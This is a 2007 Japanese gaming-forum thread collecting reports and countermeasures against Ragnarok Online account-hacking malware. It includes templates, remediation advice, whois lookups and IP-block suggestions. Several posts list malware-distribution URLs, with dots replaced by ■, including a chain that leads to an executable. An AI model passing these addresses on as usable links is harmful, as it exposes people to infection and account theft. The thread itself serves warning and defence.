アカウントハック総合対策スレ6

1 ：L ★ ： 2007/03/15(木) 21:55 ID:???0

アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例に関して扱います。
重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

・ 関連＆参考情報アドレス (>>2)
・ 報告用＆質問用テンプレ (>>3, >>4)
・ アカウントハック対応の要点とFAQ (>>5)
・ 安全対策の簡易まとめ (>>6)

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。

2 ：L ★ ： 2007/03/15(木) 21:55 ID:???0

【一般的話題用】
セキュリティ対策、質問・雑談スレ
　http://enif.mmobbs.com/test/read.cgi/livero/1173878067

【過去スレ】
アカウントハック総合スレ 5
　http://gemma.mmobbs.com/test/read.cgi/ragnarok/1170419695
アカウントハック被害報告スレ4
　http://gemma.mmobbs.com/test/read.cgi/ragnarok/1164984508
アカウントハック被害報告スレ3
　http://gemma.mmobbs.com/ragnarok/kako/116/1160787177.html.gz
アカウントハック被害報告スレ2
　http://gemma.mmobbs.com/ragnarok/kako/114/1147966576.html.gz
アカハック被害報告スレ
　http://gemma.mmobbs.com/ragnarok/kako/107/1075385114.html.gz

【参考アドレス】
・ROアカウントハック報告スレのまとめ？サイト
　http://sky.geocities.jp/vs_ro_hack/
・安全の為に (BSWikiより)
　http://smith.xrea.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
　http://lineage.nyx.bne.jp/

【このスレでよく出てくるアプリケーション】
・PeerGuardian2（設定などはリネージュ資料室内・セキュリティ対策参照）
　ttp://lineage.nyx.bne.jp/misc/security/?id=basic-ipfilter

【PCにウィルス対策ソフトを導入してない方へ】
・Kaspersky Anti-Virus (体験版)
　http://www.kaspersky.co.jp/trial/
・カスペルスキー：オンライン ウイルス＆スパイウェアスキャナ
　http://www.kaspersky.co.jp/scanforvirus/
・NOD32 アンチウイルス (体験版)
　http://www.canon-sol.jp/product/nd/trial.html

3 ：L ★ ： 2007/03/15(木) 21:55 ID:???0

【投稿の際の注意】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
　加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
　.(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質
　に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

----------報告用テンプレ----------
● 実際にアカウントハックを受けた時の報告用

【　 　 　 気付いた日時　 　 　 　 　 】 (被害に気付いた日時)
【不審なアドレスのクリックの有無　】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【 　 　ツールの使用の有無　 　 　 】 (Yes/No、Yesの場合はそのToolの説明)
【　 ネットカフェの利用の有無　 　　】 (Yes/No)
【　 　　 OS　 　 】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【　アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【説明】
(被害状況を詳しく書く)

4 ：L ★ ： 2007/03/15(木) 21:55 ID:???0

● 怪しいアドレス？を踏んだ時用

【　　アドレス 　 】 (ドット(.)を■等で置き換える事。h抜き等は駄目)
【気付いた日時】 (感染？に気付いた日時)
【　 　　 OS　 　 】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【　アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く)

5 ：L ★ ： 2007/03/15(木) 21:56 ID:???0

【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は BSWikiの『安全の為に』が参考になると思われます。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
　1) 速やかに感染PCのネットワークケーブルを外す
　2) 『安全な環境』から諸々のパスワードを変更
　3) ウィルス駆除 もしくは OSのクリーンインストールやPCの再セットアップを行う

注)
　・安全確認されるまでNetworkに接続・ROクライアント起動・公式にログインは厳禁
　・各種メッセンジャーソフトやメールクライアントの起動も避ける
　・変更するべき物は以下のとおり
　　『GungHo-IDパスワード』『アトラクションIDパスワード』『キャラパスワード』『メールアドレス』
　・アンチウイルスソフトの過信は禁物。自信がなければ再セットアップを第1選択枝とする事
　・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる

● 関連FAQ
・『安全な環境』ってどんな物？
　　ウイルスの感染が無いと思われる環境です。別PCや据置型ゲーム機、1CD Linux等が挙げられます。
　　インターネットカフェ等不特定多数が使用する環境は危険性の高い環境です。
　　また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
　　信頼できる友人にパスワード変更を依頼するのは最後の手段であり、安全な環境を
　　構築次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目？
　　駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね？
　　100％の保証は出来ません。ウィルスが見つからなかった場合、チェックに使った
　　アンチウィルスソフトでは発見出来なかっただけです。本当にウィルスが居ないのか、
　　それとも検知を免れているだけなのかは判りません。
　　自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです
・1CD Linuxってなに？
　　CDを入れてPCを起動するだけでLinux環境が起動しちゃうというものです。
　　ある意味クリーンインストールに近い状態なので汚染はゼロといえますし、
　　そもそもWindowsではないのでアカウントハックウイルスも働きません。
　　大概はWindows類似のデスクトップ環境やWebブラウザも組み込まれているので
　　パスワード変更作業くらいなら問題なく出来ます。
　　"KNOPPIX" や "Ubuntu"が人気が有ります

6 ：L ★ ： 2007/03/15(木) 21:56 ID:???0

【安全対策の簡易まとめ】
以下は要点となります。higaitaisaku.comさんの『被害対策』→『転ばぬ先の杖』
(http://www.higaitaisaku.com/korobanu.html)が参考になるでしょう。
『ROアカウントハック報告スレのまとめ？サイト』やBSWikiの『安全の為に』も
参考になると思われます。

● 基本
　・定期的なWindowsUpdate及び、各種ソフト(メディアプレーヤ等)のアップデート
　・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新
　・パーソナルファイアーウォールソフトの導入
　・アドレスをホイホイ踏まない。よく確認する
　・出所の怪しいプログラムやスクリプトを実行しない

● 応用
　・IEの使用を止め、他のブラウザに乗り換える (Firefox、Opera)
　・IEコンポーネント使用のブラウザを使う (セキュリティ設定が容易な物が多い)
　・信頼できるSite以外ではスクリプトやActiveXを切る
　　：インターネットオプションのセキュリティの部分で設定可能
　・偽装jpg対策 (IE6sp2 と IE7限定。IE6sp1以前では出来ない)
　　：インターネットオプション→セキュリティ→レベルのカスタマイズ
　　　→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

7 ：(^ー^*)ノ〜さん sage ： 2007/03/15(木) 21:57 ID:I+HsHPxi0

7げと　スレ立て乙です

8 ：(^ー^*)ノ〜さん sage ： 2007/03/15(木) 22:37 ID:zw3Z99od0

(　ﾟ∀ﾟ)<ﾌﾟｯﾌﾟｰ

9 ：(^ー^*)ノ〜さん sage ： 2007/03/15(木) 23:29 ID:Y57LKog00

前スレ >>990、
>そのあと、家族共有で再インストールとかできないため

家族共有なら逆にすぐにOS再インストールしろよ。そうでないと家族の情報まで
お前さんのせいで垂れ流しにならんとも限らんぞ。
家族が仕事に使ってたとしたら、仕事を首になるほどの大問題にも
発展しかねないんだから、家族に協力してもらって早めに対応しなさい

10 ：(^ー^*)ノ〜さん sage ： 2007/03/15(木) 23:35 ID:eUuDknd+0

確認なんだが
雑談スレもテンプレに入ったし、踏んじゃった助けて、って報告主にはここでは回答せず
セキュリティ対策、質問・雑談スレ
　http://enif.mmobbs.com/test/read.cgi/livero/1173878067
に誘導でおｋ？

11 ：(^ー^*)ノ〜さん sage ： 2007/03/15(木) 23:39 ID:tVmtCQDo0

>>10
ｏｋ

12 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 00:04 ID:/2uIW1kP0

>>10
っても、向こう報告用のテンプレ（>>4）無いね･･･。
まぁ作れば（こっちにあるのそのまま活用でも）いいだけなんだけどさ。

で、前スレ >>990
まずは>>4を埋めるのが先決だと思うよ。
そうすればどうすればいいかもある程度わかってくるだろうし。

13 ：これも追加しとこう。 sage ： 2007/03/16(金) 01:16 ID:YzFRLToN0

キャラクタースロットの空きスロットについて。

ハッキングされたされないに関わらずに埋めておくほうが得策だと思われます。

β時代に頻繁に、混戦時に繋げようとすると他人のアカウントに繋がる現象というのがありました。
もし今そういうものが再発したorなんらかの不具合で発生した場合にも、
キャラ枠が空いて居ればノービスを作ってごっそり倉庫のもの持っていかれますし、
キャラが埋まっていてパス設定していれば被害無しになります。

これは今問題になっているハックとは違いますが、万が一こういった事が置きた場合なども考えると
プレイしているサーバーのキャラクター枠は埋めておいたほうが安心できると思います。

14 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 02:30 ID:qd+hN8to0

サウスバウンド系追加
http://www.southbound-inc■com/images/pricejtopro.gif (gif偽装html)
-> http://www.southbound-inc■com/lib/smarty/internals/smartyro.htm
--> http://www.lineagecojp■com/tro/tro.exe

今後は一見それっぽくない…、たとえば .co.jp のサイトなんかも
気にしないといけなくなったということですねぇ。

もう「踏まないこと」は限界。
踏んでも痛くない状態にしておくことが必須でしょう。


メモ:
Active Virus Shield
http://www.activevirusshield.com/

面白そうだけど まだ評価できてません。

15 ： ◆sp4Sh9QXGI sky.geocities.jp/vs_ro_hack/ ： 2007/03/16(金) 02:50 ID:kqHrUt7f0

>>1さま
スレ立てお疲れさまです。

とりあえずサイト更新しました。
このスレには出てきていませんが、リネージュ資料室さまで見かけた
ragnarok-bbs■comというドメインも追加しています。

それではおやすみなさいﾉｼ

16 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 03:06 ID:R201HhuO0

ttp://internet.watch.impress.co.jp/cda/news/2006/12/01/14107.html

こういうのも良いかもしれない。

17 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 03:23 ID:R201HhuO0

ネトゲ用のRBL（リアルタイムブラックリスト）なんてどうだろう。
もうすでに他がやってるかな。

18 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 06:03 ID:8+QVgf0R0

しむらー(依頼者)、スレタイスレタイ！
分かり良いように『問題』とか『対策』って語を入れるって流れじゃなかったっけ。

スレの使い分けをはこんな感じかね
・ここ
-> 『被害対策』『情報提供』 (スレ違いはLiveROに誘導)
・LiveRO
-> 『被害相談』『セキュリティに関する一般的話題』『雑談』

とりあえずこっちのスレだけ読んでおけば非スレ住民でも対策のための情報は
十分ゲットできる、そんな感じがよさげと思う。情報の密度を上げる為に
できるだけLiveROを活用すべきだなーと思う。なんか合宿所スレみたいな構造だなー。

セキュリティパッチの情報とかはこっちでも良いと思うけど、
ちょっとした思い付きとか(前スレ988のような物でも)はLiveROの方がいいと思う。
実際にやってみて効果のあることなら此方でも良いと思うけど。

あと職テンプレに貼られてた、新ドメイン名と思しき物。
http://www■slower-qth■com/8651262/
http://www■wikiwiKi-game■com/8651262/

前者はリネージュ資料室に既出なので、後者のみDomaintoolsによる情報アドレス。
http://whois.domaintools.com/wikiwiki-game.com

19 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 06:32 ID:5ajOPH8Z0

垢ハックのは装備換金RMT目的

俺は注意を呼びかけたりするまでデカクなると誰も買わなくなって自滅すると思うのだが
これだけ何かあってもまだ買ったりする人がいるって怖いよな･･･買ってる人も職別wiki見てるだろう？

20 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 07:43 ID:8x0LbUiBO

職WIKIやネカフェでやられても、不正者乙で片付けられてしまうからな。
やられたことのない奴の共通認識は、｢自分だけは大丈夫｣

21 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 12:11 ID:G1LDBCDU0

>>14氏のいう
> もう「踏まないこと」は限界。
> 踏んでも痛くない状態にしておくことが必須でしょう。
これに尽きる気がする。

もう中国のIPを総弾きするしかないような気がしてきたよ。
これだけ見境なくハックアドレスが張られてる現状じゃ
みんなで頑張って情報を提供しあっていても後手になっちゃうし。
極端すぎるかな…。

中国 IPv4
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=cn

FWにJeticoを使っている人なら、非公式ヘルプを公開してくれてる方の
Wikiから中国・韓国のIPリストが入手できるよ。
中国のホムペとか見ない人なら、一気にBlockZoneに設定できるので楽かも。

22 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 12:42 ID:dUaKmVnF0

>>21
>もう中国のIPを総弾きするしかないような気がしてきたよ。
特別な理由が無ければ中国へのあらゆる接続を最初から全て禁止にして
必要な所だけその都度許可していく方法で問題ないだろう。
アカウントハッキングのために使われるドメインを無差別に与えてる事実もあるし
極端な対応だとは思わないな。

23 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 13:17 ID:yisC8ByJ0

質問
垢ハクってキャラパスはいちいちSS取って送ってるんだよな？
４つの数字入れるとき１を押すと２を押したことになるように
パスワードの押す数字と送る数字を好きなように変えるツールがあるんだけど
これってNG?

24 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 13:19 ID:o5q9mpEi0

>21-22
リネ資料室には昔から中韓台リストがあるわけで……
PG2を導入した人はあそこを見てるはずで、その時に一緒に中韓台リストがあるわけで。
中華系を気にする人は既にブロックしてると思う。

それよりこちらで報告が無かった(と思う)ので資料室さんところから転記。

>2007/3/11
>「セキュリティ対策」および「スパム対策」で、ウィルスサイトへの誘導記事にスパム投稿元アドレスを
> fj.cn.cndata.com から 163data.com.cn に変更（プロバイダ側でドメイン設定を変更したため）。
>アクセス拒否にドメイン名を指定して設定している方は、上記ドメインに変更しておくことをお勧めします。
>できればしばらくの間は新旧両方のドメインを設定しておくと良いでしょう。

25 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 13:27 ID:aFxEnVMI0

>>23
MMOBBSではその手の話題は禁止なので
LiveROの支援ツールスレへどうぞ

26 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 13:29 ID:m6MYXZyj0

>>23
ツールの是非はともかくパケット読まれたら意味がないとだけ

27 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 13:34 ID:ossJ+oXA0

>>23
ＳＳ撮って送れば盗み出せるというだけであって、SS撮ってる（山田ウィルスのような）ものが確認された訳ではない。
単なる方法論。

現在わかっているものでは、パケを読み取るものならある。

>これってNG?
MMOBBSではNGであり、なおかつ、現在主流のものに対しては無力。

28 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 14:36 ID:o5q9mpEi0

セキュリティ雑談スレより
------------------------------------
14 名前：（○口○*）さん Mail：sage 投稿日：07/03/16 (金) 13:50 ID:rYnyKtqR0

136 ：(^ー^*)ノ〜さん ：07/03/16 12:24 ID:OSeBMiF30
これでもみて落ち着け
ttp://up■uppple■com/src/up2551.jpg

MMO-BBS弓手系の情報交換スレ　228
より抜粋

アップローダーそのものはノーマルのもの。
Jpeg偽装でもってくタイプですね
即座にウィルス警告だしてくれた人がいたので心配はないと思うけど一応。
会話の流れがヒートしてたところにだしてきたし、中華以外かしら(？´・ω・｀)

一応実際に狐からファイル保存でＤＬ、バイナリでチェックだけさらっとかけました。
Avastさんはトロイと認定っと。相変わらず重いけど優秀（でも時々スっとろいねん）な子だ。
------------------------------------

中身はhtmlだが100kb超えるサイズになってる上、ブラクラやbbs-qrcode・zhangweijpへの
リンクもあって大変危険。
何名か踏んだ人がいるようなので、ご注意を。

29 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 15:09 ID:ossJ+oXA0

>>28
ちょ・・・iframeだらけ

30 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 15:12 ID:AqkDK5340

>>28
危険な物詰め合わせって感じだな

31 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 15:40 ID:j3I8p+8Z0

詰め合わせというレベルじゃねーぞ（AA略
いやマジで爆弾に近い。

どんなマルウェアが何個仕込まれるかわかったもんじゃない。
下手すれば3桁とかぶち込まれる可能性があるし、これを踏んだ人は冗談抜きで
HDDフォーマットの上OS再インストールしたほうがいい。

32 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 16:50 ID:1Zn1d/6L0

今googleでROM776検索して一番上に出てきたサイト踏んじまったんだが…

すぐに戻ったもののウイルス喰らった気が（´・ω・｀）

33 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 16:59 ID:wDwDl1lN0

宣伝乙

34 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 17:06 ID:1Zn1d/6L0

>33
厨はすっこんでろ

…と言いたいところだがアンタが正しい、
変なのはSleipnir検索の方だった、吊ってくるorz

35 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 17:15 ID:ap8TDRK50

結局この子は何がしたかったんだ?

36 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 17:24 ID:1Zn1d/6L0

>>35
↓リンク先注意↓
http://whois.domaintools.com/rom776.com

コレ踏んで焦ってテンパってた（´д｀;）
結局何のページなのかは不明…

37 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 17:25 ID:MJvVMGUw0

そのまま貼るんじゃなくて改変しろよ

38 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 17:28 ID:1Zn1d/6L0

>>37
悪い…こういう所あんまり書き込まないから勝手が解らなかった

これからはテンプレくらい見るよ

39 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 18:00 ID:HqAEpsgG0

>>36
domaintoolsはドメインの所有者情報を調べるサイト
誰かが検索すると情報はキャッシュされ、会員限定で過去の情報も閲覧できる

「踏んで焦ってテンパってた」がrom776■comのことを指してるのであれば
いまのところどんなサイトなのか明らかになってないな

40 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 18:24 ID:gzxNkvLI0

現時点では、サイトに書かれている文面からは、SEO絡みの検証目的くらいしか読み取れない。
但し、既存の有名情報サイトに類似したドメインを取得している時点で、安易に考えるのは禁物。
ドメインスクワッターに転じるかもしれないし、迷いこませる事自体を目的にしたアフィリサイトに変貌するかもしれない。

41 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 19:05 ID:r+VFK07a0

いつもの福建人により以下が登録された。
wikiwiki-game■com

数日前にはてなが不正アクセスでIRC BOT設置されてたらしいので各種サイト持ちはアカウント管理に要注意。
所謂ブルートフォースだと言う。

そういえば以前はてなに垢ハック目的のアカウントとページが幾つかあった。
リネージュ資料室の感染源サイトページでもその時のURLが見れる。
ひょっとすると・・・。

杞憂であれば良いが。
とにかくご用心ご用心。

42 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 20:07 ID:YzFRLToN0

せめて福建人くらいは逮捕されてくれいないものか・・・

43 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 20:35 ID:Aj05lLeM0

以前にも報告したものですが、また私のブログにアカハック目的と思われる書き込みがありました。
承認後表示の設定にしておいてよかった。

ちなみに、

訪問及び足跡並びにコメントおおきに(*＾ｖ＾*）
//www■geocitylinks■com/games/jp.htm

記録されているIPは210.16.212.10でした。

以上、報告します。

44 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 20:58 ID:ME/9GXJw0

悪意ある投稿を受けた自サイト持ちは、契約ISP(Blogレンタル元含む)への通報もセットで。
ユーザーからの突き上げが多くなれば、やがては国内ISPやIXでインバウンド遮断も検討せざるを得なくなるだろう。
只でさえ、spamの発信元やクラッカーの巣となっている訳だし。

45 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 21:15 ID:oB0VRtd90

噂のカスペルスキーにしてみた
トロイ3つ見つかった(((;ﾟдﾟ))

RO起動すると赤い警告出るんだが俺だけ？

46 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 21:16 ID:wf+5iB8z0

それはnProが行儀悪いから検出してるだけ。

47 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 21:16 ID:jd1MgV8y0

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067

48 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 21:18 ID:/d8O4SNx0

IPアドレス 210.16.212.10
ホスト名 　対応するホスト名がありません
IPアドレス
　割当国　※ 韓国 (KR)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

49 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 21:20 ID:U9+0MnuU0

BOTを放置していたツケが回ってきたな
毎日誰かがハック当たり前のゲームになったら完全に終わる

50 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 21:56 ID:ME/9GXJw0

>>43
>IPv4 Address : 210.16.212.0-210.16.212.63
>Network Name : HANINTERNET-LLINE-PCROOMHOHOKJ
>Connect ISP Name : HANINTERNET
>Registration Date : 20060602
>Publishes : N

PC房割り当てIPの模様。差し支えが無ければ/26丸ごと拒否で良いかと。

51 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 22:42 ID:8+QVgf0R0

あるWikiへのアカハクアドレス書込より。
www■rokonline-jp■com/blog/

DomainToolsではこんな感じ。又新ドメイン名投入かな。
http://whois.domaintools.com/rokonline-jp.com

Creation Date........ 2007-03-13 18:57:35
Registration Date.... 2007-03-13 18:57:35
Expiry Date.......... 2008-03-13 18:57:35
Organisation Name.... hang long
Organisation Address. lyzsl
Organisation Address.
Organisation Address. ly
Organisation Address. 364000
Organisation Address. FJ
Organisation Address. CN

52 ：(^ー^*)ノ〜さん ： 2007/03/16(金) 22:49 ID:AdRGeoG+0

報告おつかれさまです。

個人的に色々と自衛にも限界を感じてきた。
一旦警鐘age

53 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 23:00 ID:z7oRh5n+0

>>18
対策って入ってるぜ

54 ：(^ー^*)ノ〜さん sage ： 2007/03/16(金) 23:08 ID:tfdsmJLN0

>>52
偽装とかまでやられるとさすがにな・・・
公式で何も無い所見ると癌呆的にはウェブサイト見なければOKって感じなのかね

55 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 00:01 ID:VkLOJJ/A0

カスペルスキーオンラインスキャンしながら色々見てるんだが
既に1つウィルス発見されてる
ノートン先生仕事してくださいｗ

56 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 00:24 ID:vmuP/yNT0

　　　　＿＿＿_
　　　／　　 　 　＼
　 ／　　─　 　 ─＼ 　
／ 　　 （ー） 　（ー） ＼
|　 　　 　 （__人__）　 　 |
/　　　　 ∩ノ ⊃　　／
(　 ＼　／ ＿ノ　|　 |
.＼　“　　／＿＿|　 |
　　＼ ／＿＿＿ ／

57 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 00:28 ID:ycmdTg5p0

こっちよりLiveROの方が質が高い気がしてきた

58 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 00:32 ID:dcj6loMh0

使い分ければいいだけ。
告知スレと突っ込みすれのように、報告系はこっちに集約すればいい。

基本的にスレが伸びない方がいいわけで、未読が多いとアウトブレイクが
発生したのかと焦るし。

59 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 00:42 ID:Ye/z/7wJ0

>>55
普及率高い割りに見事役立たずだったノートン先生ですが、
手元の環境では木曜日あたりからよーやく検知してくれているようです。
# 調査用の検体見事に喰われちゃったよ。

>>14 自己フォロー

Active Virus Shield
http://www.activevirusshield.com/

近頃話題のAOL提供の無料で使えるウィルス対策ソフトです。
サイトからメールアドレス入力。メールで受け取ったアクティベーション
キーをインストール後に入力すればOK。めんどい入力フォームとか無し。

英語版しか提供されていませんが、別段困ることはないでしょう。
市販版からは省略されている機能があるらしいのですが、定評ある
エンジンですから対アカハックに限定して言えば、下手な更新 0円
ソフトよりベターなのかもしれず…。

まだ一日使っただけですが、個人的にはオススメできるかなと。
ファイアウォール機能はないので別途ご用意の上合わせてご利用ください。

60 ：(^ー^*)ノ〜さん ： 2007/03/17(土) 00:53 ID:RtPx62Rp0

>>59
それ、BSWikiのページで
>検出力はエンジンのおかげで優れているが、規約に『個人情報を収集する』等
>あるので選択としては微妙感あり
って紹介されてるんだな。でもって2chのセキュリティ板にもスレがあって、
http://pc11.2ch.net/test/read.cgi/sec/1170858305/
とりあえず現状では何もないみたい。個人情報ってのを過度に気にする
必要は無いと思うが、津垢う上では頭に入れておくべきだと思う。
因みにあの某ネットランナーではフリーで最優秀のアンチウイルスソフトに
決定されたとか何とか。

61 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 01:23 ID:SrvsyBRw0

つあかう

なんかかわいい

62 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 05:55 ID:tRg+Klrb0

【　　アドレス 　 】http://www■lineagejp-game■com/8651262
【気付いた日時】 3/16
【　 　　 OS　 　 】 Windows 2000 SP4
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 一週間前？不明
【　アンチウイルスソフト 】 対策無し 感染に築いてからカスペル導入
【その他のSecurty対策 】 （Spybot S&D、Ad-Aware SE personal）
【 ウイルススキャン結果】
Trojan-Downloder.JS.Agent.dj
Trojan-Downloder.JS.Agent.bw
Trojan-Downloder.JS.Agent.di
【スレログやテンプレを読んだか】 (Yes)
【説明】

低価格でナイスなヘッドフォン
ttp://wiki.nothing.sh/52.html
（改めて右欄のURLを見てみると、リネージュ系のURLが大量に出てくる）

飛んだ先で青画面、驚いてオンラインスキャンしてみたら…という感じでした。
オンラインゲーム系のWIKIだけではなく、こういうのも危険なんだと
改めて認識した次第です。
とりあえずはご報告までに。

63 ：(^ー^*)ノ〜さん ： 2007/03/17(土) 06:16 ID:2dqdMFc50

スレ一覧�dだっぽいんでage

64 ： ◆sp4Sh9QXGI sky.geocities.jp/vs_ro_hack/ ： 2007/03/17(土) 06:33 ID:iifDZB9r0

おはようございます、中の人です。
朝イチで更新しました。寒いです。
rokonline-jp■com　　→　　202.75.223.131
見たことのないIPだったので、PG2用リストは積極版も一緒に更新しています。
ご確認ください。
またguild-wars-online■comにもいつの間にか
208.113.160.130というIPが割り当てられていたようなのでこちらも一緒に。

#jprmthomeは新ドメイン取得に必死ですねぇ…。

65 ：(^ー^*)ノ〜さん age ： 2007/03/17(土) 11:37 ID:G1lAm/Pg0

下がりすぎだと思ったので警鐘age

66 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 14:13 ID:3Ab75Vg30

うちのBBSに文字化けで投稿されていた垢ハック書込み。

投稿者のIP：165.228.132.11（AustraliaのIP）

アクセスログ：偽装してないなら、普通にIE6ですね。
[2523][2007/03/16,19:00:17]--Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

(new) 云社ＲＯと曳ﾝ^すると 名前： RO-BBS [2007/03/16,19:01:49] No.373 返信
久何ｫ@誼ｽU�YｃA饗ﾊ 50蔚
垢恬ｫ@誼ｽU�YｃA饗ﾊ 50蔚
アイテムドロップ楕 8蔚
廾や｣疋蹈奪彗ﾊ 8蔚
カｩ`ドドロップ楕 40蔚
恷仟マップとオリジナルモンスタｩ`携廾。
オリジナルＮＰＣ嗤り。
ペットボｩ`ナス原紗嗤り
タナトス、テコン、般宀、ガンスリンガｩ`携廾
伏悶携�Y侭、壼｢龍歓漾▲侫譽・餤遏｢
アルナペルツ縮忽、オｩ`ディン舞去、キルハイル吉携廾
騅ﾟBサイトを歌孚して和さい
http://www■ragnarok-bbs■com/links/

67 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 14:13 ID:3Ab75Vg30

「www■ragnarok-bbs■com」のIPアドレスへの変換結果→「222.77.185.87」

inetnum: 222.76.0.0 - 222.79.255.255
netname: CHINANET-FJ
descr: CHINANET fujian province network
descr: China Telecom
descr: No1,jin-rong Street
descr: Beijing 100032
country: CN
admin-c: CH93-AP
tech-c: CA67-AP

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: anti-spam@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032

role: CHINANETFJ IP ADMIN
address: 7,East Street,Fuzhou,Fujian,PRC
country: CN
nic-hdl: CA67-AP
mnt-by: MAINT-CHINANET-FJ

68 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 21:10 ID:SJAIMCAQ0

丁度1年前に垢ハック逢ったんだけど
今から警察言行っても間に合うカナカナ？
やっぱ1年も経ってたらサポートしてくれないかな・・・

69 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 21:23 ID:A+Jt1NU40

うだうだ言ってる暇があるなら、さっさと警察行け。

70 ：(^ー^*)ノ〜さん sage ： 2007/03/17(土) 21:35 ID:G1lAm/Pg0

誰の言葉か忘れたけど、こういうのがある。

例えば君が、私に対して「小説を書きたいと思っています」と言ったとする。
しかし、私は君が本気で小説を書きたいと思っているとは思わない。
何故なら、本当に君が小説を書きたいのであれば私と話すことなどなく、
既に机に向かっているはずだからだ。

つまり、まずは行動しなさいってこった。

